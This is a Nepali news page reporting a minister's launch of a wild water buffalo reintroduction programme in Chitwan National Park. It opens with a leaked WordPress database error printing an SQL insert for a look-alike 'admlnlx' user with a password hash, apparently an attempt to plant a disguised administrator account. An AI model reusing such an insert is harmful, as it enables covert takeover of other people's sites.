WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B90Loy4SL/JtJ6dYCqETZ3l8cxZq1k.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-28 08:09:32', '', 'admlnlx', 'admlnlx')
चितवन, माघ १४–
वन तथा भूसंरक्षण मन्त्री शंकर भण्डारीले कोशीको अर्ना चितवन राष्ट्रिय निकुञ्ज परिवारको नयाँ अंगको रुपमा रहेको बताउनुभएको छ ।
आज (शुक्रबार) चितवनको सौराहामा अर्ना पुनस्र्थापना कार्यक्रमको उद्घाटन गर्दै मन्त्री भण्डारीले यस्तो बताउनुभएको हो । उहाँले चितवन ल्याईएको अर्ना हामी सबैको सम्पती रहेको भन्दै यसको संरक्षण र सम्वद्र्धनमा सबै लाग्नुपर्ने बताउनुभयो । “निकुञ्ज परिवारमा अर्ना नयाँ अंगको रुपमा आएको छ, यसको संरक्षण र प्रवद्र्धनसंगै चितवन निकुञ्जको गरिमा कायम राख्नुपर्छ ।”–मन्त्री भण्डारीले भन्नुभयो ।
मन्त्री भण्डारीले हाल २० वटा अर्ना यहाँ ल्याउने स्वीकृत रहेको जनाउँदै अगामि दिनमा यसको संख्या बढ्दै जानेमा विश्वास व्यक्त गर्नुभयो । उहाँले अर्नालाई चितवनबासीले पारिवारिक सम्बन्धको रुपमा लिनुपर्ने उल्लेख गर्नुभयो ।
यस्तै मन्त्री भण्डारीले चितवन राष्ट्रिय निकुञ्जलाई कसरी राष्ट्रिय उत्पादनमा उपयोग गर्न सकिन्छ र समुदायलाई लाभ हुन्छ भन्ने विषयमा वन मन्त्रालय गृहकार्य गरिरहेको जानकारी दिनुभयो । उहाँले सामुदायिक वनहरुलाई अब पर्यटनको विकाससंग जोड्न आवश्यक रहेको बताउनुभयो ।